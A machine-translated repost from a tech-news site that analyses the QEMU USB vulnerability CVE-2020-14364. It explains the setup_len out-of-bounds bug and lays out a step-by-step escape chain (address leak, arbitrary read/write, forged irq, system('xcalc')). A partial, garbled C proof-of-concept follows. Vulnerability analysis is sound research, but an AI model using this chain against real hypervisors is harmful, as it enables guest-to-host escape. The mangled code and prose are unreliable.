Shulou(Shulou.com)05/31 Report--

This article introduces how to analyze the vulnerabilities of QEMU CVE-2020-14364. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

Introduction to QEMU

QEMU (quick emulator) is a free executable hardware virtualization open source hosted virtual machine (VMM) written by Fabrice Bellard et al.

The USB backend of QEMU has an out-of-bounds read and write vulnerability when realizing the communication between the USB controller and the USB device, which may lead to the escape of the virtual machine.

Causes of loopholes

The USB bus communicates with USB devices by creating a USBpacket object.

The Usbpacket object contains the following key content

Struct USBPacket {/ * Data fields for use by the driver. * / int pid; uint64_t id; USBEndpoint * ep;....}

"pid" indicates the type of packet, and there are three types: in, out and setup. Ep points to the endpoint object and locates the target usb device through this structure.

The data exchange between the data_buf which is a buffer in usbdevice and the buffer requested by usb_packet_map in the usbpacket object is realized by the usb_packet_copy function. In order to prevent the length of the buffer from being mismatched, the length of the transfer is limited by s-> setup_len.

Case SETUP_STATE_DATA:

If (s-> setup_buf [0] & USB_DIR_IN) {int len = s-> setup_len-s-> setup_index; if (len > p-> iov.size) {len = p-> iov.size;} usb_packet_copy (p, s-> data_buf + s-> setup_index, len); s-> setup_index + = len If (s-> setup_index > = s-> setup_len) {s-> setup_state = SETUP_STATE_ACK;} return;}

The vulnerability lies in do_token_setup, the process of s-> setup_len assignment.

S-> setup_len = (s-> setup_buf [7] setup_buf [6]; if (s-> setup_len > sizeof (s-> data_buf)) {fprintf (stderr, "usb_generic_handle_packet: ctrl buffer too small (% d >% zu)\ n", s-> setup_len, sizeof (s-> data_buf)); p-> status = USB_RET_STALL; return;}

Although the verification has been carried out, the value of s-> setup_len has been set before the check, resulting in an out-of-bounds read-write vulnerability when using usb_packet_copy in do_token_in or do_token_out.

Vulnerability exploitation:

1. Disclose the address of the USBdevice object.

Observe the out-of-line readable content and discover

Struct USBDevice {... Uint8_t setup_buf [8]; uint8_t data_buf [4096]; int32_t remote_wakeup; int32_t setup_state; int32_t setup_len; int32_t setup_index; USBEndpoint ep_ctl; USBEndpoint ep_ in [MAX_ENDPOINTS]; USBEndpoint ep_ out [MAX_ENDPOINTS]; QLIST_HEAD (, USBDescString) strings; const USBDesc * usb_desc / * Overrides class usb_desc if not NULL * / const USBDescDevice * device;.}

The object address of usbdevice can be obtained from ep_ctl- > dev below.

2. We can get the location of s-> data_buf through the object address of usbdevice, and then we only need to overwrite the setup_index below as the destination address-(s-> data_buf) to write any address.

3. We also need to get any address reading function. Setup_buf [0] controls the direction of writing and can only be modified by do_token_setup. Because we used the out-of-bounds write function in the second step, setup_buf [0] is the write direction, so we can only write, not read.

Bypass method: set setup_index = 0xfffffff8, cross the boundary again, modify the value of setup_buf [0], and then modify setup_index to the address to be read again to achieve arbitrary address reading

4. Read the contents of the usbdevice object through any address to get the address of the ehcistate object, and again use any address to read the contents of the ehcistate object to get the ehci_bus_ops_companion address. The address is located in the program data section. At this point, we can get the load address and system @ plt address of the program. The load address can also be obtained by reading the usb-tablet object after the fixed offset position of the usbdevice.

5. Forge irq structure in data_buf.

6. Hijack the irq object in ehcistate with forged structure.

7. Read the register through mmio to trigger ehci_update_irq and execute system ("xcalc"). Complete the utilization.

Vulnerability poc code # include # include unsigned char* mmio_mem;char * dmabuf;struct ohci_hcca * hcca;struct EHCIqtd * qtd;struct ohci_ed * ed;struct ohci_td * td;char * setup_buf;uint32_t * dmabuf32;char * td_addr;struct EHCIqh * qh;struct ohci_td * td_1;char * dmabuf_phys_addr;typedef struct USBDevice USBDevice Typedef struct USBEndpoint USBEndpoint;struct USBEndpoint {uint8_t nr; uint8_t pid; uint8_t type; uint8_t ifnum; int max_packet_size; int max_streams; bool pipeline; bool halted; USBDevice * dev; USBEndpoint * fd; USBEndpoint * bk;}; struct USBDevice {int32_t remote_wakeup; int32_t setup_state; int32_t setup_len; int32_t setup_index; USBEndpoint ep_ctl USBEndpoint ep_in [15]; USBEndpoint ep_out [15];}; typedef struct EHCIqh {uint32_t next; / * Standard next link pointer * / * endpoint characteristics * / uint32_t epchar; / * endpoint capabilities * / uint32_t epcap; uint32_t current_qtd; / * Standard next link pointer * / uint32_t next_qtd / * Standard next link pointer * / uint32_t altnext_qtd; uint32_t token; / * Same as QTD token * / uint32_t bufptr [5]; / * Standard buffer pointer * /} EHCIqh;typedef struct EHCIqtd {uint32_t next; / * Standard next link pointer * / uint32_t altnext / * Standard next link pointer * / uint32_t token; uint32_t bufptr [5]; / * Standard buffer pointer * /} EHCIqtd;uint64_t virt2phys (void* p) {uint64_t virt = (uint64_t) p; / / Assert page alignment int fd = open ("/ proc/self/pagemap", O_RDONLY); if (fd =-1) die ("open") Uint64_t offset = (virt / 0x1000) * 8; lseek (fd, offset, SEEK_SET); uint64_t phys; if (read (fd, & phys, 8)! = 8) die ("read"); / / Assert page present phys = (phys & ((1ULL epchar=0x00;qh- > token=1token=1)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.